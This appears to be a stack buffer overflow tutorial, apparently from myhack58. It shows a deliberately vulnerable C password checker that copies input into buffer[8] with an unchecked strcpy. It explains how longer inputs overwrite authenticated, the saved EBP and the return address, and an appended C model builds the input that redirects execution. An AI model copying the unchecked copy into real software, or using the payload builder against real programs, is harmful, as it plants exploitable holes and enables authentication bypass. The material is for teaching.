Stack overflow exploitation

ID MYHACK58:62201560968
Type myhack58
Reporter 佚名 (anonymous)
Modified 2015-04-09T00:00:00


Following the stack overflow principles explained above, we now turn to exploiting a stack overflow. Rather than reuse the example from the previous article, I will write a small C program and walk through the stack overflow principle again with it; becoming more familiar with how the stack frame behaves lets us exploit stack overflows more effectively. The example code is below. It is very simple, so I will not explain it line by line.



```c
#include <stdio.h>
#include <string.h>

#define PASSWORD "qqqqqqq"

int verify_password(char *password)
{
    int authenticated;
    char buffer[8];
    authenticated = strcmp(password, PASSWORD);
    strcpy(buffer, password); // construct stack overflow: no length check on the copy
    return authenticated;
}

int main(void)
{
    int valid_flag = 0;
    char password[1024];
    while (1) {
        printf("please input password: ");
        scanf("%s", password);
        valid_flag = verify_password(password);
        if (valid_flag) {
            printf("incorrect password!\n\n");
        } else {
            printf("Congratulation! you have passed the Verification!\n");
            break;
        }
    }
    getchar(); // pause so the console window stays open
    return 0;
}
```

As the code shows, this is a password validity check: the input password is compared against the stored one, and the result decides whether authentication succeeds. The walkthrough below assumes a 32-bit build without stack protection (the original was built with VC6); with a modern compiler, build with /GS- or -fno-stack-protector and confirm the frame layout in the debugger, since the relative placement of buffer and authenticated on the stack is up to the compiler. First, let us run the program.

Compare the program's behaviour on a correct and an incorrect password. With 7 'q' characters as input, the program runs normally; the stack state at that point is shown in the following figure:

If we keep lengthening the input, the characters beyond the boundary of buffer[8] will successively overwrite authenticated, the saved EBP of the previous stack frame, and the return address. In other words, by controlling the length of the string we can make the ASCII codes of its characters overwrite these stack-frame values. ('q' is 0x71, and since x86 is little-endian the NUL terminator, written last, becomes the most significant byte of whichever DWORD it lands in.) From the stack-frame analysis above we can draw the following conclusions:

(1) With 11 'q' characters as input, characters 9 to 11 plus the NUL terminator overwrite authenticated with 0x00717171.

(2) With 15 'q' characters, characters 9 to 12 overwrite authenticated with 0x71717171, and characters 13 to 15 plus the NUL terminator overwrite the saved EBP of the previous stack frame with 0x00717171.

(3) With 19 'q' characters, characters 9 to 12 overwrite authenticated with 0x71717171; characters 13 to 16 overwrite the saved EBP with 0x71717171; and characters 17 to 19 plus the NUL terminator overwrite the return address with 0x00717171.

Here we use a 19-character input and look at what effect the overwritten return address has on the program. Because the overwritten objects are DWORD-aligned, we organize the input in units of "4321", so the final test string is "4321432143214321432". Load the program in OllyDbg and observe the stack after the string copy function (strcpy) returns. The analysis follows. First, with 7 'q' characters as input, observe the stack contents on return:

Now run with the input 4321432143214321432. The actual memory contents match the conclusions of our analysis; the stack state is shown below:

Next we single-step the program in OD (OllyDbg) to follow what happens at the return:

The return address is where execution goes when the current function returns. When the function returns, the "retn" instruction executes; at that moment the element on top of the stack is exactly the return address. "retn" pops it into the EIP register, and execution continues at that address. In this example the return address should have been 0x040FACB, an instruction in main's code area, but we have overwritten it with the ASCII codes of our characters, turning it into 0x00323334. In the debugger we can see what happens on the machine:

(1) When the function returns, the return address is loaded into EIP.

(2) The processor fetches the next instruction from the address in EIP, 0x00323334.

(3) Memory at 0x00323334 does not hold a valid instruction; the processor cannot execute it and raises an exception.

Because 0x00323334 is an invalid instruction address, the fetch faults and the program crashes. But if we put a valid instruction address there instead, we can make the processor jump to any instruction we choose (for example, straight to the "verification passed" branch); that is, by overwriting the return address we control the program's execution flow. Recall what this code does: it authenticates a password, prints a success message if it is correct and an error message otherwise. So we can overwrite the function's return address with the address of the code that prints the success message and reach our goal that way. Next we make some improvements to the program.
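To make the byte-level arithmetic of the conclusions above concrete, here is an added example that is not part of the original article. It models the 20 bytes of verify_password's frame that strcpy can reach (buffer[8], authenticated, saved EBP, return address, at the offsets the page describes), replays the three inputs from the analysis to show which value lands in each slot, and then goes one step further than the text: it builds the 19-character input that delivers a chosen return address, enforcing the two constraints the program's own input path imposes (scanf("%s") stops at whitespace, strcpy stops at NUL). The address 0x00401234 is a hypothetical stand-in for the address of the "verification passed" code, and the 0xCC marker for untouched bytes is my own convention.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model of the verify_password() stack frame described on this page,
 * lowest address first (x86, 32-bit, no stack protection):
 *   [0..8)   char buffer[8]
 *   [8..12)  int  authenticated
 *   [12..16) saved EBP of the caller
 *   [16..20) return address into main()
 * Twenty bytes is exactly what a 19-character input plus its NUL reaches.
 */
#define FRAME_BYTES 20
#define OFF_AUTH    8
#define OFF_EBP     12
#define OFF_RET     16
#define UNTOUCHED   0xCC   /* marker for bytes strcpy never wrote */

/* Read a 32-bit slot as x86 would (little-endian), independent of the host CPU. */
static uint32_t slot32(const unsigned char *f, size_t off)
{
    return (uint32_t)f[off] | (uint32_t)f[off + 1] << 8 |
           (uint32_t)f[off + 2] << 16 | (uint32_t)f[off + 3] << 24;
}

/* Emulate strcpy(buffer, input): copies strlen(input)+1 bytes, terminator included.
 * Returns 0, or -1 if the input would run past the modelled 20-byte frame. */
int simulate_overflow(const char *input, unsigned char frame[FRAME_BYTES])
{
    size_t n = strlen(input) + 1;
    if (n > FRAME_BYTES)
        return -1;
    memset(frame, UNTOUCHED, FRAME_BYTES);
    memcpy(frame, input, n);
    return 0;
}

/* Value of each slot after the copy; 0xFFFFFFFF signals an input too long to model. */
uint32_t authenticated_after(const char *input)
{
    unsigned char f[FRAME_BYTES];
    return simulate_overflow(input, f) ? 0xFFFFFFFFu : slot32(f, OFF_AUTH);
}
uint32_t ebp_after(const char *input)
{
    unsigned char f[FRAME_BYTES];
    return simulate_overflow(input, f) ? 0xFFFFFFFFu : slot32(f, OFF_EBP);
}
uint32_t ret_after(const char *input)
{
    unsigned char f[FRAME_BYTES];
    return simulate_overflow(input, f) ? 0xFFFFFFFFu : slot32(f, OFF_RET);
}

/* Build the 19-character input that places `target` in the return-address slot.
 * Two constraints come from the program's own input path:
 *   - scanf("%s") stops at whitespace, so no typed byte may be ' ' or 0x09..0x0D;
 *   - strcpy() stops at the first NUL, so the only zero byte allowed is the most
 *     significant one, and it is supplied by the terminator rather than typed.
 *     That is why a 0x00XXXXXX address fits this frame and 0x12345678 does not.
 * Returns 0 and fills out[] (20 bytes incl. NUL), or -1 if target cannot be sent. */
int build_payload(uint32_t target, char out[FRAME_BYTES])
{
    unsigned char b[4];
    for (int i = 0; i < 4; i++)
        b[i] = (unsigned char)(target >> (8 * i));
    if (b[3] != 0x00)
        return -1;
    for (int i = 0; i < 3; i++) {
        if (b[i] == 0x00 || b[i] == ' ' || (b[i] >= 0x09 && b[i] <= 0x0D))
            return -1;
    }
    memset(out, 'q', 16);      /* fills buffer[8], authenticated and saved EBP */
    memcpy(out + 16, b, 3);    /* low three bytes of the address, little-endian */
    out[19] = '\0';            /* the terminator becomes the address's high byte */
    return 0;
}

int main(void)
{
    const char *inputs[] = { "qqqqqqqqqqq", "qqqqqqqqqqqqqqq", "4321432143214321432" };
    for (size_t i = 0; i < 3; i++)
        printf("%-20s auth=0x%08X ebp=0x%08X ret=0x%08X\n", inputs[i],
               (unsigned)authenticated_after(inputs[i]), (unsigned)ebp_after(inputs[i]),
               (unsigned)ret_after(inputs[i]));

    char payload[FRAME_BYTES];
    /* 0x00401234 is a made-up address standing in for the "verification passed" code. */
    if (build_payload(0x00401234u, payload) == 0)
        printf("payload %s -> ret=0x%08X\n", payload, (unsigned)ret_after(payload));
    return 0;
}
```

The model only reproduces the arithmetic; on the real target the address to use comes from the debugger, and it must satisfy the same whitespace and NUL constraints that build_payload checks, which is exactly why this particular frame (terminator landing in the high byte) tolerates a 0x00XXXXXX user-space address.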
